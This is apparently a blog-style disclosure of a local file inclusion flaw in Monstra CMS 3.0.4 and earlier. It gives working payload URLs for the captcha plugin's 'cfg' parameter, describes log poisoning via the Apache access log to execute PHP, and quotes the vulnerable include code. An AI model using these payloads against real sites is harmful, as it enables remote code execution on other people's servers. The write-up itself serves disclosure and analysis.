Monstra 3.0.4 Local File Inclusion Vulnerability

[Zbadblog]

Brief of this vulnerability
There is a local File Inclusion Vulnerability in the CMS, which can be exploited by an attacker to execute PHP code

Test Environment

Apache/2.4.39 (Windows10)
PHP 5.4.45-2+mysql 5.7.26

Affect version
<=3.0.4

payload

http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=filename

We can create phpinfo.txt In the web directory, the content is<?php phpinfo();?>

http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\www\phpinfo.txt

Or we can use Apache logs

1. use burpsuite
   

2. include log
   http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log
   

Reason of This Vulnerability
Directly from the get parameter and include this parameter, resulting in a vulnerability，Vulnerability file：
plugins\captcha\crypt\cryptographp.inc.php

#..\plugins\captcha\crypt\cryptographp.inc.php
if (( ! isset($_COOKIE['cryptcookietest'])) and ($_GET[$_GET['sn']] == "")) {
    header("Content-type: image/png");
    readfile('images/erreur3.png');
    exit;
}

if ($_GET[$_GET['sn']] == "") { unset ($_GET['sn']); }

session_start();

// Takes only the configuration files in the same directory
if ($_GET['cfg'] ) { $_SESSION['configfile']=$_GET['cfg']; } else {  $_SESSION['configfile'] = "cryptographp.cfg.php"; }

include($_SESSION['configfile']);

As long as we assign a value to the sn variable and it is not empty, we can skip the first 2 if syntax，The variable CFG is directly assigned to configFile, and then the include method is executed, resulting in a vulnerability